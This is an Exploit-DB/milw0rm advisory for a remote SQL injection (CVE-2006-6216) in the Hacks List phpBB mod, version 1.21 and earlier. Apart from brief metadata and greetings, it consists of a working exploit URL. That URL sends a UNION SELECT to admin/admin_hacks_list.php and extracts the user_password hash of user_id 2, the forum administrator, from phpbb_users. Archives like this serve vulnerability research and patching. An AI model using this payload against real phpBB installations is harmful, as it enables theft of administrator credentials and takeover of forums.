Hacks List phpBB Mod <= 1.21 - Remote SQL Injection Vulnerability

2006-11-26T00:00:00
ID EDB-ID:2851
Type exploitdb
Reporter the master
Modified 2006-11-26T00:00:00

Description

Hacks List phpBB Mod <= 1.21 Remote SQL Injection Vulnerability. CVE-2006-6216. Webapps exploit for php platform

                                        
                                            ########################################################################
#  Admin Hacks List  v1.20  Remote SQL Injection Vulnerability
# 
#  Download: http://www.nivisec.com
#
#  Found By: the master
#
########################################################################
#  exploit:
#
# http://[Target]/[Path]/admin/admin_hacks_list.php?mode=edit&hack_id=-99%20UNION%20SELECT%20null,null,user_password,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=2&sid=AdminHash
#
# Greetz: str0ke , Dr Max Virus
########################################################################

# milw0rm.com [2006-11-26]